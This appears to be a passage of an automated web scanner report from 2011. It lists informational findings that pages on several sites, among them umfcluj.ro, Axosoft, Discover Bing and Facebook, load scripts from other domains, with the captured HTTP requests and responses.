http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:36:38 GMT
Content-Length: 61593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.36. http://umfcluj.ro/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:10 GMT
Content-Length: 60428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.37. http://umfcluj.ro/en previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/en

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:10 GMT
Content-Length: 38709

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.38. http://umfcluj.ro/fr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/fr

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Products=; expires=Mon, 18-Jul-2011 17:28:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:28:16 GMT
Content-Length: 38338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.39. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:09 GMT
Content-Length: 81440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.40. http://umfcluj.ro/search.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/search.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.google.com/jsapi?key=ABQIAAAANZwfykwsHCjNL4gERaktPBSzWx17LJe0SsmJ8gqY9WfjG1R9hxTT4yq5qGTyi8mF0sc7JhLg1pVJGA

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:33 GMT
Content-Length: 35912

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="/css/search.css" />
<script src="http://www.google.com/jsapi?key=ABQIAAAANZwfykwsHCjNL4gERaktPBSzWx17LJe0SsmJ8gqY9WfjG1R9hxTT4yq5qGTyi8mF0sc7JhLg1pVJGA" type="text/javascript"></script>
...[SNIP]...

21.41. http://umfcluj.ro/sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/sitemap.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:08 GMT
Content-Length: 104455

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...

21.42. http://www.adminitrack.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adminitrack.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://verify.authorize.net/anetseal/seal.js
https://seal.verisign.com/getseal?host_name=www.adminitrack.com&size=S&use_flash=NO&use_transparent=YES&lang=en

Request

Response

21.43. http://www.atlassian.com/en/resources/wac/js/globalNav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atlassian.com
Path:	/en/resources/wac/js/globalNav.js

Issue detail

The response dynamically includes the following script from another domain:

http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /en/resources/wac/js/globalNav.js HTTP/1.1
Host: www.atlassian.com
Proxy-Connection: keep-alive
Referer: http://www.atlassian.com/software/jira/?gclid=CLiIoYbNjaoCFcFo4AodkV0lxw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=5737F51AEFA9638FB922D6856A505242; __utma=80426056.1841877914.1311085237.1311085237.1311085237.1; __utmb=80426056.3.10.1311085237; __utmc=80426056; __utmz=80426056.1311085237.1.1.utmgclid=CLiIoYbNjaoCFcFo4AodkV0lxw|utmccn=(not%20set)|utmcmd=(not%20set); __utmv=80426056.|1=ft=google!cpc!!!not-set=1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:30 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=1800, public
Expires: Tue, 19 Jul 2011 14:50:30 GMT
Vary: Accept-Encoding
Last-Modified: Tue, 19 Jul 2011 00:39:50 GMT
Content-Type: application/x-javascript;charset=UTF-8
Content-Length: 27343

AtlassianGlobalNav_en = function() {};
AtlassianGlobalNav_en.prototype = {
   create_ui: function() {
       if (jQuery("#atlassian-global-nav")) {
           var nav_div = jQuery("<div></div>").attr("id", "gl
...[SNIP]...
</div>").attr("id", "google_translate_element");
               google_translate_element.attr("style", "display:block;");
               jQuery("body").append(google_translate_element);
               var googleTranslate = jQuery("<script id='google_translate_script' src='http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit'></script>
...[SNIP]...

21.44. http://www.atlassian.com/software/jira/pricing.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.atlassian.com
Path:	/software/jira/pricing.jsp

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:21:23 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 46278

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

<head>

<title>
Get Started For $10 - Pricing - JIRA
</
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

21.45. http://www.axosoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.axosoft.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en
http://www.google.com/jsapi
http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:25:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 23658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.46. http://www.axosoft.com/lp/ga/bug-tracking-software/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.axosoft.com
Path:	/lp/ga/bug-tracking-software/

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en
http://www.google.com/jsapi
http://www.googleadservices.com/pagead/conversion.js

Request

Response

21.47. http://www.axosoft.com/ontime previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.axosoft.com
Path:	/ontime

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en
http://www.google.com/jsapi
http://www.googleadservices.com/pagead/conversion.js

Request

GET /ontime HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
Referer: http://www.axosoft.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gd4ro2453nos1b55a10z0q3f; __utma=37276784.862101086.1311078323.1311078323.1311078323.1; __utmc=37276784; __utmz=37276784.1311078323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=2794942522048503467; is_returning=1; _chartbeat2=y78z346lekhphix3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:19:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.48. http://www.axosoft.com/ontime/bug_tracking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.axosoft.com
Path:	/ontime/bug_tracking

Issue detail

The response dynamically includes the following scripts from other domains:

http://t2.trackalyzer.com/trackalyze.js
http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en
http://www.google.com/jsapi
http://www.googleadservices.com/pagead/conversion.js

Request

GET /ontime/bug_tracking HTTP/1.1
Host: www.axosoft.com
Proxy-Connection: keep-alive
Referer: http://www.axosoft.com/ontime
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gd4ro2453nos1b55a10z0q3f; _jsuid=2794942522048503467; __utma=37276784.862101086.1311078323.1311078323.1311085183.2; __utmb=37276784.1.10.1311085183; __utmc=37276784; __utmz=37276784.1311078323.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); is_returning=1; _chartbeat2=y78z346lekhphix3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.49. http://www.bnymellonam.com/core/hub/am_site_selector.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bnymellonam.com
Path:	/core/hub/am_site_selector.html

Issue detail

The response dynamically includes the following script from another domain:

http://ebusiness.melloninstitutional.com/lib/jquery/1.3.2/jquery.min.js

Request

GET /core/hub/am_site_selector.html HTTP/1.1
Host: www.bnymellonam.com
Proxy-Connection: keep-alive
Referer: http://www.bnymellonam.com/core/hub/am_site_selector.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServermgi-bnymellonam-tpc.bnymellon.com-pool-80=1198603018.20480.0000

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:35 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script t
...[SNIP]...

<script type="text/javascript" src="http://ebusiness.melloninstitutional.com/lib/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

21.50. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boston.com
Path:	/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The response dynamically includes the following script from another domain:

http://w.sharethis.com/button/sharethis.js

Request

Response

21.51. http://www.discoverbing.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.discoverbing.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery.ui/1.8.5/jquery-ui.min.js
http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/analytics.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/flashver.min.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/home.min.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/hotspots.min.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/jquery.simplemodal.1.4.1.min.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/omniture.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/s_code.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/searchbox.min.js
http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/unsupported.min.js
http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/jwplayer.js
http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/silverlight.js
http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/tools.js
http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/wmvplayer.js
http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/xaml.js
http://static.meteorsolutions.com/metsol.js

Request

GET / HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=yln2iy45tia1yyebr32a2n55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: dbingvisitnew=TRUE; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:41 GMT
Content-Length: 48248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<link rel="icon" href="https://cdndiscoverbing.blob.core.windows.net/sitecore/favicon.ico" />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.ui/1.8.5/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/jquery.simplemodal.1.4.1.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/analytics.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/flashver.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/home.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/hotspots.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/searchbox.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/unsupported.min.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://az10143.vo.msecnd.net/sitecore/dbing/css/VisitorIdentification.css"/>

<script language="javascript" type='text/javascript' src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/silverlight.js"></script>
<script language="javascript" type='text/javascript' src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/wmvplayer.js"></script>
<script language="javascript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/tools.js"></script>
<script language="javascript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/xaml.js"></script>
<script language="javascript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/jwplayer.js"></script>
...[SNIP]...
<meta property="og:site_name" content="Discover Bing" />

<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/s_code.js"></script>
<script language="JavaScript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/omniture.js"></script>
...[SNIP]...

21.52. http://www.facebook.com/advertising/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/advertising/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.53. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.54. http://www.facebook.com/badges/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.55. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.56. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.57. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.58. http://www.facebook.com/facebook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/facebook

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.59. http://www.facebook.com/find-friends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/find-friends

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

21.60. http://www.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/help/

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.61. http://www.facebook.com/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/mobile/

Issue detail

